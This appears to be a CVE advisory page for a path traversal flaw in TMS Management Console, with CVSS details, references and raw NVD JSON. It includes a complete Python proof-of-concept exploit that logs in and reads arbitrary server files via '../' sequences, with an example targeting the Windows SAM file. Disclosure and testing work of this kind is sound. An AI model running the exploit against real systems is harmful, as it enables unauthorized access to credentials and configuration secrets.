CVE-2025-69612

Description

A path traversal vulnerability exists in TMS Management Console (version 6.3.7.27386.20250818) from TMS Global Software. The "Download Template" function in the profile dashboard does not neutralize directory traversal sequences (../) in the filePath parameter, allowing authenticated users to read arbitrary files, such as the server's Web.config.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:tmsglobalsoft:tms_management_console:*:*:*:*:*:*:*:* - VULNERABLE

TMS Management Console < 6.3.7.27386.20250818

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-69612 Path Traversal PoC
# Target: TMS Management Console < 6.3.7.27386.20250818
# Vulnerability: Unvalidated filePath parameter in Download Template function

def exploit(target_url, username, password, file_to_read):
    """
    Exploit path traversal vulnerability to read arbitrary files
    
    Args:
        target_url: Base URL of TMS Management Console
        username: Valid low-privilege user credentials
        password: User password
        file_to_read: Absolute path of file to read (e.g., ../../../Web.config)
    """
    
    # Login to obtain session
    login_url = f"{target_url}/api/auth/login"
    login_data = {
        "username": username,
        "password": password
    }
    
    session = requests.Session()
    response = session.post(login_url, json=login_data)
    
    if response.status_code != 200:
        print(f"[-] Login failed: {response.status_code}")
        return False
    
    print(f"[+] Login successful")
    
    # Exploit path traversal via Download Template function
    exploit_url = f"{target_url}/api/profile/download-template"
    
    # Construct path traversal payload
    payload = {
        "filePath": f"../../../{file_to_read}"
    }
    
    print(f"[*] Attempting to read: {file_to_read}")
    response = session.get(exploit_url, params=payload)
    
    if response.status_code == 200 and len(response.content) > 0:
        print(f"[+] File content retrieved successfully")
        print(f"[+] Content length: {len(response.content)} bytes")
        print(f"\n--- File Content ---\n")
        print(response.text)
        return True
    else:
        print(f"[-] Failed to retrieve file")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 5:
        print(f"Usage: {sys.argv[0]} <target_url> <username> <password> <file_path>")
        print(f"Example: {sys.argv[0]} http://target.com:8080 admin password 'Windows/System32/config/sam'")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    file_path = sys.argv[4]
    
    exploit(target, user, pwd, file_path)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-69612
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-69612
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-69612/
[4] VulDB https://vuldb.com/cve/CVE-2025-69612
[5] http://tms.com
[6] https://github.com/Cr0wld3r/CVE-2025-69612/blob/main/PoC.md
[7] https://tmsglobalsoft.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-69612", "sourceIdentifier": "[email protected]", "published": "2026-01-22T16:16:07.227", "lastModified": "2026-02-03T14:06:34.640", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A path traversal vulnerability exists in TMS Management Console (version 6.3.7.27386.20250818) from TMS Global Software. The \"Download Template\" function in the profile dashboard does not neutralize directory traversal sequences (../) in the filePath parameter, allowing authenticated users to read arbitrary files, such as the server's Web.config."}, {"lang": "es", "value": "Una vulnerabilidad de salto de ruta existe en TMS Management Console (versión 6.3.7.27386.20250818) de TMS Global Software. La función 'Download Template' en el panel de control del perfil no neutraliza las secuencias de salto de directorio (../) en el parámetro filePath, lo que permite a los usuarios autenticados leer archivos arbitrarios, como el Web. config del servidor."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tmsglobalsoft:tms_management_console:*:*:*:*:*:*:*:*", "versionEndIncluding": "6.3.7.27386.20250818", "matchCriteriaId": "6514685A-4E29-42AA-BA76-C3775457DD27"}]}]}], "references": [{"url": "http://tms.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://github.com/Cr0wld3r/CVE-2025-69612/blob/main/PoC.md", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}, {"url": "https://tmsglobalsoft.com/", "source": "[email protected]", "tags": ["Product"]}]}}